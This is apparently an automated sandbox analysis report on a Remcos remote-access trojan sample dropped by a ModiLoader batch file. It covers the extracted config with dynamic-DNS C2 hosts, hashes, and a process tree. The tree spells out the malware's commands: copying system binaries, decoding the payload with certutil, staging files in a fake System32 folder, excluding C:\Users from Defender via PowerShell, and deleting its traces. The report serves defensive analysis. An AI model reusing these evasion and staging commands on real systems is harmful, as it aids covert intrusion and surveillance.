Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-04-2024 12:35

General

  • Target

    23042024_2035_final.cmd

  • Size

    4.4MB

  • MD5

    6094887c2ab95de62b09c2c2b25f8a06

  • SHA1

    b3f8986bdbfa79c5b0314382061bd4e6ff475b17

  • SHA256

    969563b96c33286b127298208e5e28ed8a3c5878e34c7df2cb09419fffe726f7

  • SHA512

    44117de7a710a082661697f2f8b8fb0961f97ab96eac58212890db9646e9ae2a7f118421c9c195bcd983a5f6e96ea1a4a12f1a0075459ad21ad247441d975d46

  • SSDEEP

    49152:rqn6yInGos9t2oOfPUlIVHpkIuT5rOSqcNX6xro0b+mZrRQNMg0Qw9eizGv4:Z

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

myumysmeetr.ddns.net:2404

mysmeetr.ddns.net:2404

meetre1ms.freeddns.org:2404

bbhmeetre1ms.freeddns.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    WINWIN-3PED2K

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\23042024_2035_final.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:2988
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4292
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:5096
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\23042024_2035_final.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:5020
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\23042024_2035_final.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
            3⤵
            • Executes dropped EXE
            PID:4604
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3640
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
            3⤵
            • Executes dropped EXE
            PID:4164
        • C:\Users\Public\Libraries\sppsvc.pif
          C:\Users\Public\Libraries\sppsvc.pif
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5840
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ReqkgdfbO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:3932
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:4652
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:5660
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:3088
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:4608
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:5420
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:4760
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5700
                      • C:\Windows\System32\extrac32.exe
                        C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                        6⤵
                          PID:5136
                        • C:\Users\Public\alpha.exe
                          C:\\Users\\Public\\alpha /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:4132
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                            7⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2328
                  • C:\Windows\SysWOW64\extrac32.exe
                    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Reqkgdfb.PIF
                    3⤵
                      PID:388
                    • C:\Windows\SysWOW64\colorcpl.exe
                      C:\Windows\System32\colorcpl.exe
                      3⤵
                        PID:3596
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:3644
                    • C:\Users\Public\alpha.exe
                      C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                      2⤵
                      • Executes dropped EXE
                      PID:4136

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\remcos\logs.dat
                    Filesize

                    146B

                    MD5

                    b7ee989e82b759d1ad07fe29755116b7

                    SHA1

                    f4bc46ae1ef0edefe88f20eaf5ba3f24df662487

                    SHA256

                    6bc3b125afced530848af33087575637d2cdc5bf3b823cb4fa50d9c6e5111c69

                    SHA512

                    d7e6289b07473f16f1520058f961c8cf8bb7050b6b97f3a3c55bc5d453f33b1b2a54cf69679bedb6a36d402022dfaf8f35ed39d2410c6fcfe547f6add33f8a06

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2stpooob.ahk.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Public\Libraries\ReqkgdfbO.bat
                    Filesize

                    29KB

                    MD5

                    828ffbf60677999579dafe4bf3919c63

                    SHA1

                    a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                    SHA256

                    abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                    SHA512

                    bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

                  • C:\Users\Public\Libraries\aaa.bat
                    Filesize

                    3KB

                    MD5

                    71e46efe9932b83b397b44052513fb49

                    SHA1

                    741af3b8c31095a0cc2c39c41e62279684913205

                    SHA256

                    11c20fabf677cd77e8a354b520f6ffca09cac37ce15c9932550e749e49efe08a

                    SHA512

                    76da3b441c0eaaaabdd4d21b0a3d4aa7fd49d73a5f0dab2cfb39f2e114efe4f4dabe2d46b01b66d810d6e0efa97676599ece5c213c1a69a5f2f4897a9b4ac8da

                  • C:\Users\Public\Libraries\easinvoker.exe
                    Filesize

                    128KB

                    MD5

                    231ce1e1d7d98b44371ffff407d68b59

                    SHA1

                    25510d0f6353dbf0c9f72fc880de7585e34b28ff

                    SHA256

                    30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                    SHA512

                    520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

                  • C:\Users\Public\Libraries\netutils.dll
                    Filesize

                    114KB

                    MD5

                    566b326055c3ed8e2028aa1e2c1054d0

                    SHA1

                    c25fa6d6369c083526cafcf45b5f554635afe218

                    SHA256

                    a692d4305b95e57e2cfc871d53a41a5bfc9e306cb1a86ca1159db4f469598714

                    SHA512

                    da4b0b45d47757b69f9abc1817d3cb3c85deb08658e55f07b016fba053efe541a5791b9b2b380c25b440bbae6916c5a2245261553ca3c5025d9d55c943f9823c

                  • C:\Users\Public\Libraries\sppsvc.pif
                    Filesize

                    1.6MB

                    MD5

                    bc05131061626ff2e000be97c251400e

                    SHA1

                    8832aaf1cf39b29133025e5661960be72e6f54e0

                    SHA256

                    093caf593112fbe0e88c51ceaaff39ae998622031bd5fd2dceccc48f1dd8f40d

                    SHA512

                    3cbcf081f96d2d852765f938e2b4273875eb45b74a0bebd07b85f960bfea44145b1f0e8d62527e094a69755f1f4ac5f45576d4507a92eac12a51048c57641c31

                  • C:\Users\Public\alpha.exe
                    Filesize

                    283KB

                    MD5

                    8a2122e8162dbef04694b9c3e0b6cdee

                    SHA1

                    f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                    SHA256

                    b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                    SHA512

                    99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                  • C:\Users\Public\kn.exe
                    Filesize

                    1.6MB

                    MD5

                    bd8d9943a9b1def98eb83e0fa48796c2

                    SHA1

                    70e89852f023ab7cde0173eda1208dbb580f1e4f

                    SHA256

                    8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                    SHA512

                    95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

                  • C:\Users\Public\sppsvc.rtf
                    Filesize

                    3.2MB

                    MD5

                    476ba890f490c6388b38542634afb665

                    SHA1

                    860470ca6f55602d45de6a230b0fe6a09bf6b5cc

                    SHA256

                    7c4b097337ebe5defe9946d74883f203029661000967bbc7fca0544ef9dc132e

                    SHA512

                    ac3bae8c79087de11d3e1ad935c8dba2766696fe9651c5b0267e90d60aa0d5f4069c506af5499cba0686c58cc10710f7a4d323ff37e9297f3d1b7ce20cef98ac

                  • memory/2328-69-0x00007FFF73B60000-0x00007FFF74621000-memory.dmp
                    Filesize

                    10.8MB

                  • memory/2328-70-0x000001B2687A0000-0x000001B2687B0000-memory.dmp
                    Filesize

                    64KB

                  • memory/2328-74-0x00007FFF73B60000-0x00007FFF74621000-memory.dmp
                    Filesize

                    10.8MB

                  • memory/2328-71-0x000001B2687A0000-0x000001B2687B0000-memory.dmp
                    Filesize

                    64KB

                  • memory/2328-64-0x000001B26A920000-0x000001B26A942000-memory.dmp
                    Filesize

                    136KB

                  • memory/3596-90-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-88-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-104-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-100-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-80-0x0000000004F20000-0x0000000005F20000-memory.dmp
                    Filesize

                    16.0MB

                  • memory/3596-83-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-86-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-87-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-85-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-96-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-89-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-95-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-91-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/3596-93-0x0000000000400000-0x0000000000482000-memory.dmp
                    Filesize

                    520KB

                  • memory/4760-52-0x00000000613C0000-0x00000000613E3000-memory.dmp
                    Filesize

                    140KB

                  • memory/5840-32-0x0000000000400000-0x00000000005A2000-memory.dmp
                    Filesize

                    1.6MB

                  • memory/5840-29-0x0000000002970000-0x0000000003970000-memory.dmp
                    Filesize

                    16.0MB

                  • memory/5840-27-0x00000000024C0000-0x00000000024C1000-memory.dmp
                    Filesize

                    4KB

                  • memory/5840-30-0x0000000002970000-0x0000000003970000-memory.dmp
                    Filesize

                    16.0MB